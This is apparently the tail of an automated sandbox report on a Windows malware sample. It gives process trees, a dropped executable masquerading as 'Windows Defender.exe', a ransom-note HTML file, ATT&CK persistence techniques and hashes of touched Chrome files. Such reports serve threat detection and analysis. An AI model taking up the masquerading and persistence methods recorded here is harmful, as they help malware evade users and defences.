      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=5604 --field-trial-handle=1908,i,14042922229068777627,12485210962527397119,131072 /prefetch:1
      4⤵
      PID:3408
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4620 --field-trial-handle=1908,i,14042922229068777627,12485210962527397119,131072 /prefetch:8
      4⤵
      PID:5976
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4596 --field-trial-handle=1908,i,14042922229068777627,12485210962527397119,131072 /prefetch:8
      4⤵
      PID:6132
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5876 --field-trial-handle=1908,i,14042922229068777627,12485210962527397119,131072 /prefetch:8
      4⤵
      Modifies registry class
      PID:5188
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html
  2⤵
  PID:212

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4276
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8485f9758,0x7ff8485f9768,0x7ff8485f9778
  2⤵
  PID:1724
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1416 --field-trial-handle=1812,i,9739818732481663498,16746156173793737880,131072 /prefetch:2
  2⤵
  PID:1148
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1812,i,9739818732481663498,16746156173793737880,131072 /prefetch:8
  2⤵
  PID:3460
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2164 --field-trial-handle=1812,i,9739818732481663498,16746156173793737880,131072 /prefetch:8
  2⤵
  PID:2304
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3156 --field-trial-handle=1812,i,9739818732481663498,16746156173793737880,131072 /prefetch:1
  2⤵
  PID:2016
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3292 --field-trial-handle=1812,i,9739818732481663498,16746156173793737880,131072 /prefetch:1
  2⤵
  PID:3840
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4520 --field-trial-handle=1812,i,9739818732481663498,16746156173793737880,131072 /prefetch:1
  2⤵
  PID:3084
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4448 --field-trial-handle=1812,i,9739818732481663498,16746156173793737880,131072 /prefetch:8
  2⤵
  PID:3836
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4780 --field-trial-handle=1812,i,9739818732481663498,16746156173793737880,131072 /prefetch:8
  2⤵
  PID:4940
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4644 --field-trial-handle=1812,i,9739818732481663498,16746156173793737880,131072 /prefetch:8
  2⤵
  PID:3644
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4700 --field-trial-handle=1812,i,9739818732481663498,16746156173793737880,131072 /prefetch:8
  2⤵
  PID:4548
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4704 --field-trial-handle=1812,i,9739818732481663498,16746156173793737880,131072 /prefetch:8
  2⤵
  PID:4720
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4484 --field-trial-handle=1812,i,9739818732481663498,16746156173793737880,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5580

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:4652

C:\Users\Admin\AppData\Roaming\Windows Defender.exe
"C:\Users\Admin\AppData\Roaming\Windows Defender.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1372

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5412

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding
1⤵
PID:5484

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:5636

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x380 0x40c
1⤵
PID:6116

C:\Users\Admin\AppData\Roaming\Windows Defender.exe
"C:\Users\Admin\AppData\Roaming\Windows Defender.exe"
1⤵
- Executes dropped EXE
PID:1512

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\CrashpadMetrics-active.pma

Filesize
1024KB

MD5
9543068b6751e1f3e11f91d72ee78d95

SHA1
b1008dfd703aafa529c36c9e68aebfa6237105f8

SHA256
d060ad21ae6e04cb58668caa52adfca573e018102cc07554d2ed3eae11ab7785

SHA512
f3d524dd5b7bf9e36bff023915f448521c4fba37eb884b4f2405aa61a5baf69fdb394e37c00dbd29dfbba20e1829479aa307d96cd46e1e1b5c255dc709fdba09

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad\settings.dat

Filesize
40B

MD5
52957d4bf2f5b79a0cf7b42e9eb1a954

SHA1
c6ca0bc3ebd37a4a7a99b3ec8b4cc29368c5fac5

SHA256
373963e79b7dd7a50576b9bf92f1a5c356e30bad53e25c44d245dfcc2f869d6b

SHA512
90f957c13fe611b314c501d6cff5fa6d747ce1bb67d32b73997292c6c846c516e509ca76351f827bfaefe80960d4ba8ee89ac7a2a9330f4741f6dce9b4170036

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad\settings.dat

Filesize
40B

MD5
52957d4bf2f5b79a0cf7b42e9eb1a954

SHA1
c6ca0bc3ebd37a4a7a99b3ec8b4cc29368c5fac5

SHA256
373963e79b7dd7a50576b9bf92f1a5c356e30bad53e25c44d245dfcc2f869d6b

SHA512
90f957c13fe611b314c501d6cff5fa6d747ce1bb67d32b73997292c6c846c516e509ca76351f827bfaefe80960d4ba8ee89ac7a2a9330f4741f6dce9b4170036

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Cache\Cache_Data\data_0

Filesize
44KB

MD5
a2e9470a7498794b13e6136efa289c3b

SHA1
0119fc2c938add1ead060866e09f0bc6463aecea

SHA256
501da582834b75cc1d930682ae599b5e5c6742cbc3485acbfe212eabf698a243

SHA512
83b58160973667263d0808faa41e0692f048785f11d0e0bc2aa29f7c8f5fb345a97e104c5809eda2f16a530131fe4779fa70c8461825cf879b400c9abc4dbd23

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Cache\Cache_Data\data_1

Filesize
264KB

MD5
b6d25c46af93df425166bddcae56eb1f

SHA1
d607609e12eb2c56fb07bd7e199b4e91f7519cad

SHA256
444a081f1a5f69f5ef2ed6135b8f953adfe21b74812e39eca4373e51e36d6270

SHA512
e8dd676e38dd4707d86b9ddf254cba6a9337e673970697da6944f39c855a4ddd113e039bb223337001ed8cc32721bb9a29ec6c7c414fc43c0113a4748b7d27b7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Cache\Cache_Data\data_2

Filesize
8KB

MD5
0962291d6d367570bee5454721c17e11

SHA1
59d10a893ef321a706a9255176761366115bedcb

SHA256
ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7

SHA512
f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Cache\Cache_Data\data_3

Filesize
4.0MB

MD5
8df1e86703f602dd9dbb910cdcfe50fa

SHA1
2ac45a31606180ec4566b1bb57120c549c9d81ae

SHA256
0ed9e3b3aaeec0e53392d5d91b5c2cace7c5345d7e8fa8a1e69cefdd1b1f5a9f

SHA512
0396ab6fcf250e1288e6133840ecc9c999642bdcb24f7c710d2111b67bdf33a0b7419bdb41ac168c4532160cc6fe1098590a6c8222143c192a66f17fc5c02dbf

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Cache\Cache_Data\f_000002

Filesize
47KB

MD5
15d80e493d1fc68bdc6a8ea1f5bdc14d

SHA1
f8cf55c328c9a9619b6bd29d45911ed64d811432

SHA256
49840eb0187fbe5c296813bce59a47284a5149e02de8a5120adf33b1401212b2

SHA512
bcd1d28f9ef934fd584cb13753cba95d4a137ccde8f5899b2e680c5c97459195c29eef8401b1754dfcf7282c6e0e8f9e72bbbd6e8547924d5080a5d8a0fe9c24

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Cache\Cache_Data\f_000003

Filesize
37KB

MD5
8b7b7fbb3b03a6363147f827f1c7548c

SHA1
1989538f1b6d6f4adebcc4752e2851d87dda996d

SHA256
42f93e826e154983acb5940d49ea3d36dfb20b2c169867754bfb7ffb2d74e79e

SHA512
809951e322d244f1eae7894d0d0b703881609b906ca1062775f6fe540b672e0603bc780d210b5d91078a7ad619ee10debdd0999bbf61855f880dca681b079c1b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Cache\Cache_Data\f_000004

Filesize
37KB

MD5
186b679830aa3905dfbab304f32913a8

SHA1
a032f0d4ec5028457b3c0d83efb64356c252e1b1

SHA256
c5df78705bdd153a7683f27a4a5f074a88241cacc7271d0e5ee9c6c27c60d8d2

SHA512
144cff925f26442309fd732c083b9de0a43f8b5d307f3789cd9fcae19727e640529384b783da00f0441730c5aa7c2db73715576de076d0d0d85ca2c5e2ff4e24

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Cache\Cache_Data\f_000005

Filesize
47KB

MD5
a1527b679f4e2808555b49e7d3dd9290

SHA1
667128343a768373c5bb305db960d9e684a10329

SHA256
8d024bbd9ca07f206a8432c16796c1a7d896658fc5244c4874df5408a998a78a

SHA512
fbc8e0e643e89ab520350265d87ae41a1e59549c997a20cce57249c18c9ecaf774843b8b12634a9ba8463c9954c18181bc9f8b95db984bcb2992da9e73ddc4d0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Cache\Cache_Data\f_000006

Filesize
37KB

MD5
d90cb261f4a509d886611473296e188e

SHA1
23551f9039c8b855b496f017c8f75b32f6e56671

SHA256
ca6c7cdd1e68e9f251fbf58e0b0ad9e883b38979e264c3cf4125f603b21c8bb4

SHA512
1cca6c9490c8f7adca7441ffea3e7445309d0c52fbaf7252e4c3c73525e00233a8173536c031747a55343bb86e96618d9c96afc6e4f8d25b0106729cca5c8031

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Cache\Cache_Data\f_00000b

Filesize
22KB

MD5
a34c77847d7a957a99edaf10a7deaccd

SHA1
1619cedec658842283a7a474adba2efdcb0d3598

SHA256
ebee5d0011bcd484c4e7067822a1bcac208a0d03a33fced5c6a222666df67350

SHA512
afe20d031816081eba10587141518fbce91ed5f3b44fa002a593f784603d4b2007c89713cd6d9ef3eee3ecb8b53a57ecd078826ba0fcc5d02f2b7de814dd1b7c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Cache\Cache_Data\f_00000e

Filesize
37KB

MD5
d90cb261f4a509d886611473296e188e

SHA1
23551f9039c8b855b496f017c8f75b32f6e56671

SHA256
ca6c7cdd1e68e9f251fbf58e0b0ad9e883b38979e264c3cf4125f603b21c8bb4

SHA512
1cca6c9490c8f7adca7441ffea3e7445309d0c52fbaf7252e4c3c73525e00233a8173536c031747a55343bb86e96618d9c96afc6e4f8d25b0106729cca5c8031

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Cache\Cache_Data\f_00000f

Filesize
1.6MB

MD5
b98f515f31729567fef96a6390c81d8e

SHA1
f807968791958c401482896e1accd37939dc47eb

SHA256
14f1489b4909a59d0532e0c17ffd9a6bfacc01783224b15f20fd3070d915dacc

SHA512
a71a674b5f1639c0e0d140ffb5711661d72d70e42b72917e49a584f3a902d0a4a52931f362075514f63c3f0c6680290b81b8471d41ad94df4404408b91eaf736

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Cache\Cache_Data\index

Filesize
512KB

MD5
d1650b6e9ff8e2451ce1979659d6674f

SHA1
192244372072b9573197684f81647bf02efa62c3

SHA256
16e8421d46852f27d6b8a9d8de95108561faae8c3b8a66aedd957020b60f3274

SHA512
77f48eff82d6be68c89c677608eb2e90814106087ed0b3adad82c4160f943077ba6021d43693d5c05668c296f6086b35302a236032139137725770ef3cbbc536

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
48B

MD5
997a93f8f3ccfa894778af4216cf4c8b

SHA1
204cf3fe2325338c9194ef97e4620f8c4ed9cb89

SHA256
2b6ee525ed2a70995a3bcd2b7ab84b182f279217f04a0061ecc33028babad044

SHA512
40f4c9abd3dc604951f2eec70530bda46487646bab8c70361a1af33e18d462964242796b914ed682c8fe546743bdf0b44cdd028b7d2f35398dc53abcedce352f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
696B

MD5
a84fb45d5bcf77d053f685d180a2601d

SHA1
15255c1306640a4199d5c09ffca6cecf15e51bcb

SHA256
b3adf1b1587863c3205817d337039b4df6dfce9945407246a9b437a565002e94

SHA512
7fad4ebb7ef2f18efacde6b3d1ad248ceed98a55a3a4e0e1c80b3a3f64c9cb357230a61c9716e68fc5269edc230c217e396d4c2bf6b1033f065575715cf9b3c7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\History

Filesize
148KB

MD5
90a1d4b55edf36fa8b4cc6974ed7d4c4

SHA1
aba1b8d0e05421e7df5982899f626211c3c4b5c1

SHA256
7cf3e9e8619904e72ea6608cc43e9b6c9f8aa2af02476f60c2b3daf33075981c

SHA512
ea0838be754e1258c230111900c5937d2b0788f90bbf7c5f82b2ceda7868e50afb86c301f313267eaa912778da45755560b5434885521bf915967a7863922ae2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Network\Cookies

Filesize
20KB

MD5
c9ff7748d8fcef4cf84a5501e996a641

SHA1
02867e5010f62f97ebb0cfb32cb3ede9449fe0c9

SHA256
4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988

SHA512
d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
993863ffed4c1b8d6176ccacdd34f708

SHA1
12e680bf99c5452bf399503d29da49fed20e43f6

SHA256
5981e2ac6ff34c7e672611929dff97ea21fc084bf15617081f3c0a592dc5ada0

SHA512
622bcab75cbb375b54576518579e4d35ab1f1b17811a03e1bb6d37a6bb9d4f026ca6ee54e279aecfa363a7e04b897f4a66f39899e7372568eb6921c0c33a5d78

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Network\Network Persistent State

Filesize
4KB

MD5
15ca0cab8d9c1c1dc05151e759032a89

SHA1
b030a4fb26c71efdf50c76913eb68ac91f8403f1

SHA256
766362c6b90927048605ff2836d3d45c1830a9fb29f967c25c1a318c62075eb1

SHA512
df80f1884405eb9c1e9f74093ebc7de0ec44f463ce8802a9946c4ecb200ca0db802b205707d78987965778d4f005f10064c4f085d9550a662f60e7dfda93b8c8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Network\TransportSecurity

Filesize
874B

MD5
9623bfb635a591b710132e7e5e1fca1e

SHA1
9cee7016a24e31339580927557f0a4ce93a928ab

SHA256
5ab3d4a7104e276b1fbb29ce4f320cbad64de2927f865372595be6480652cbfa

SHA512
b67df34355c6dfdb24661573bde87123eda794688aec3b4e5dca7c07b0710ad079b5d900ac97ff072a84880fe5ea6320962341c32ec74b9635cf789454676912

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Network\TransportSecurity

Filesize
707B

MD5
173a4a07db850c24c55dea9c19efcf70

SHA1
15fc9247fd44a829116c4c797fc1fced0d51b155

SHA256
f9758fe32d1347438b434c9aa94534891692cb57cc4f59d855cdca35c694460b

SHA512
185b2e68c8972605313d915cbb43a1ece0200651a8499c94e00f1048e8823b8d08a20fc21ac2b41b1de302e8b4f22e81d22799a46e52289a14259f7dc094ac14

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Network\TransportSecurity

Filesize
371B

MD5
f42f166ae014f8949aabbf5e0bccb07f

SHA1
482cdcf2a051ee032d712b7b305535893549484d

SHA256
361f9847417536b39ed3b906ff5efb79fb9ac7ccbe17ae40ff65e330a946bfe9

SHA512
30e26e6ea211e0c93e00af84e6cddd510e9ebbffb3135871d65c895d586d86e416cd963fdbd8c5f9d43e5f4902effd253c9a4795a2303f756f32ef5510670099

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Preferences

Filesize
6KB

MD5
0d85fb662a1c854dff7a011378a30079

SHA1
ef4b74b81711cbc5f6619462d5b08cba240fd777

SHA256
d22d6858a08e6e156b96b20ffcf97bbbba3459b5c046da600753ea237e7e7f50

SHA512
7d64a7ef50e950b876e775727c1bd035d22f15cdec138da54f360b94f57272d02067659cb24f121b56eee0543c48d1c9b68d7f41c2b607d38fd8be72e526589a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Preferences

Filesize
6KB

MD5
fd502d0cc5e3e94591c30efb9fee0b94

SHA1
8784beba175754fe94cadebdbdb3fd6649b0d24e

SHA256
5e64e66ea261b616412244adff61a67954ad14f5dc1bc684df41c95eadf90e16

SHA512
a2f3a730ea41391142ed08baadc3095990e76e04672b5ad37d7b71ae573f1577e63e4c975aca13de6861eb9388896d9e68e901e4c63d46a14ba0fd4d598595dc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Preferences

Filesize
7KB

MD5
ad9f14cc35734595b1b7e00e7c0309a7

SHA1
9157808edaac968a47e7b2608d1a8f49a2b84c2d

SHA256
b1340299e3aa8db2e6c6ce74277091e7f27d29ba898a48678eb8fb1fbf7c836a

SHA512
34d5a819f50011eb0a3f9d1d72f24195b0a5c347ecf2b3a3bb2b96edd0124b2535ed28e28e20131f49c2a8f5e6de72f55e26b89f6195126f9da49426bc93d1dd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Preferences

Filesize
7KB

MD5
f2c531a393ef44495b936f92e11475e0

SHA1
71468fe9c58feb962c8a0cf452bef06a1831a83e

SHA256
1edbb5a4a00a4374dd7572ba1fab326264855c0a0359caeaf3fedb8b97785fc4

SHA512
91557f4af9d788b580f77e05ab8772761249bda23fdac761f81f46d8c54eaa2349b70463aa3598e1aae9260a8490035fd2c46f647dc1f786af9510cf19444101

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Secure Preferences

Filesize
15KB

MD5
a2c3e239a5a4b3c21763fe37489d22a8

SHA1
37b8c21c4d9de23aae6b2bfe77afe34a3743607d

SHA256
03b5899faf035113f6a16075017f5bb04fdc9f5e1c922f38bd693183d184aa5e

SHA512
fb3594226c76074aca95d8d7c38a26fd3a0e10d9405bb64bffce3437eeae673b5296f89fcdc6af91e74ba46f131f95d681dfaf067a28fe53dadf31c7255c48b7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\f39370d4-2e1e-4560-b9f9-21e7ed66469e\index

Filesize
24B

MD5
54cb446f628b2ea4a5bce5769910512e

SHA1
c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

SHA256
fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

SHA512
8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\feb42271-92db-4db5-8c87-db365992cb9a\index-dir\the-real-index

Filesize
624B

MD5
03ce5b986ec4a9c249046fc09e33d55b

SHA1
3e13eb1021fbf90ce2aca100f3d23ba19a523503

SHA256
d68f531720b09a9d9782ef43494e1105b7db8807abead5bb3be88801fc37af74

SHA512
39be3f9e683858e314b742dd76fa07ce5a7d715dc5a199f03c95798f72eaa077cdef02adab3d3c6d793847a3f4084e4e704aa816afab5741c4435221394c350b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\feb42271-92db-4db5-8c87-db365992cb9a\index-dir\the-real-index~RFe581529.TMP

Filesize
48B

MD5
e921cb47a8525cbe0dc8329a555102c5

SHA1
5388aec6c5a7abdc679278c983ed9437123f39bf

SHA256
0abdb8564c2129d45cd771882e8fa53113171ebb6054a03b59e3a1a4d4a7aed7

SHA512
3ef301f82c61aff0f06f63d872271340e975b024c0066b215816ab8c75ca3aadd07eb6d90e71c0aa65a44df9fb42a1b8a978628d973f54eee91033e0d7dfa6e2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
56B

MD5
ae1bccd6831ebfe5ad03b482ee266e4f

SHA1
01f4179f48f1af383b275d7ee338dd160b6f558a

SHA256
1b11047e738f76c94c9d15ee981ec46b286a54def1a7852ca1ade7f908988649

SHA512
baf7ff6747f30e542c254f46a9678b9dbf42312933962c391b79eca6fcb615e4ba9283c00f554d6021e594f18c087899bc9b5362c41c0d6f862bba7fb9f83038

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
129B

MD5
0bd32bcfde647e178cdcfb770855ab30

SHA1
a7eaaa0bf48373b8fae714b25d338621b575a36b

SHA256
9f6b95e94bbec307b9984c0693f6cb401b3ce9f8a92ebb042a2093d3b6da3d72

SHA512
06105cfce920dcf58df07946e519aa5cc6dfd4ffb3a2d418c86b872c1e400322bab6392fc68da7e225cdb9175bc9873ee898e1def33614e9349931dd0337f675

Download Submit
